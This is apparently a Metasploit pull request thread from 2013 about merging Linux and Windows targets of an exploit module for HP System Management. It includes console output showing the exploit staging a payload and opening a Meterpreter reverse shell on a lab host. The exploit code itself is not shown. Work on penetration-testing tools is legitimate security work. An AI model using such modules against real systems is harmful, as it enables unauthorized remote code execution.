Add hp_sys_mgmt_exec module for Linux and enhance module for Windows #2181

Merged: 3 commits, Aug 8, 2013

mwulftange
Contributor

The hp_sys_mgmt_exec module for Linux is a port of the Windows module with minor changes due to the requirement of quotes. It also uses Perl instead of PHP as PHP may not always be in the environment PATH. Although the Windows module works perfectly, it now uses the same technique to encode the command (thankfully, PHP adopted major syntax characteristics and functions from Perl).

@wchen-r7
Contributor

wchen-r7 commented Aug 2, 2013

Thanks for the patch. It looks like you can really just merge the linux targets to the existing hp_sys_mgmt_exec module, and then move the file to multi/http/hp_sys_mgmt_exec.rb.

@mwulftange
Contributor Author

I’ve already tried that but I didn’t get it to work properly. I tried it with dynamically including the corresponding CmdStager module depending on the target. It worked for CmdStagerBourne but it didn’t work for CmdStagerVBS as it registers the advanced option DECODERSTUB during initialization.

But I’ll give your suggestion a try: I’ll dynamically include the CmdStagerBourne into the existing Windows exploit. That should work as the latter only overwrites the create_stager method.

@mwulftange
Contributor Author

I’ve managed to merge both exploits into a multi-platform exploit as described before. This is way better.

@wchen-r7
Contributor

wchen-r7 commented Aug 8, 2013

Beautiful, thanks for the merge! Module works for me, merging to master now:

msf exploit(hp_sys_mgmt_exec) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Command Stager progress -   2.77% done (2799/101001 bytes)
[*] Command Stager progress -   5.54% done (5598/101001 bytes)
[*] Command Stager progress -   8.31% done (8397/101001 bytes)
[*] Command Stager progress -  11.09% done (11196/101001 bytes)
[*] Command Stager progress -  13.86% done (13995/101001 bytes)
[*] Command Stager progress -  16.63% done (16794/101001 bytes)
[*] Command Stager progress -  19.40% done (19593/101001 bytes)
[*] Command Stager progress -  22.17% done (22392/101001 bytes)
[*] Command Stager progress -  24.94% done (25191/101001 bytes)
[*] Command Stager progress -  27.71% done (27990/101001 bytes)
[*] Command Stager progress -  30.48% done (30789/101001 bytes)
[*] Command Stager progress -  33.26% done (33588/101001 bytes)
[*] Command Stager progress -  36.03% done (36387/101001 bytes)
[*] Command Stager progress -  38.80% done (39186/101001 bytes)
[*] Command Stager progress -  41.57% done (41985/101001 bytes)
[*] Command Stager progress -  44.34% done (44784/101001 bytes)
[*] Command Stager progress -  47.11% done (47583/101001 bytes)
[*] Command Stager progress -  49.88% done (50382/101001 bytes)
[*] Command Stager progress -  52.65% done (53181/101001 bytes)
[*] Command Stager progress -  55.43% done (55980/101001 bytes)
[*] Command Stager progress -  58.20% done (58779/101001 bytes)
[*] Command Stager progress -  60.97% done (61578/101001 bytes)
[*] Command Stager progress -  63.74% done (64377/101001 bytes)
[*] Command Stager progress -  66.51% done (67176/101001 bytes)
[*] Command Stager progress -  69.28% done (69975/101001 bytes)
[*] Command Stager progress -  72.05% done (72774/101001 bytes)
[*] Command Stager progress -  74.82% done (75573/101001 bytes)
[*] Command Stager progress -  77.60% done (78372/101001 bytes)
[*] Command Stager progress -  80.37% done (81171/101001 bytes)
[*] Command Stager progress -  83.14% done (83970/101001 bytes)
[*] Command Stager progress -  85.91% done (86769/101001 bytes)
[*] Command Stager progress -  88.68% done (89568/101001 bytes)
[*] Command Stager progress -  91.45% done (92367/101001 bytes)
[*] Command Stager progress -  94.22% done (95166/101001 bytes)
[*] Command Stager progress -  96.99% done (97965/101001 bytes)
[*] Command Stager progress -  99.75% done (100748/101001 bytes)
[*] Sending stage (751104 bytes) to 10.0.1.8
[*] Command Stager progress - 100.00% done (101001/101001 bytes)
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.8:1179) at 2013-08-08 13:33:07 -0500

meterpreter >

wchen-r7 added a commit that referenced this pull request Aug 8, 2013
@wchen-r7 wchen-r7 merged commit 9955899 into rapid7:master Aug 8, 2013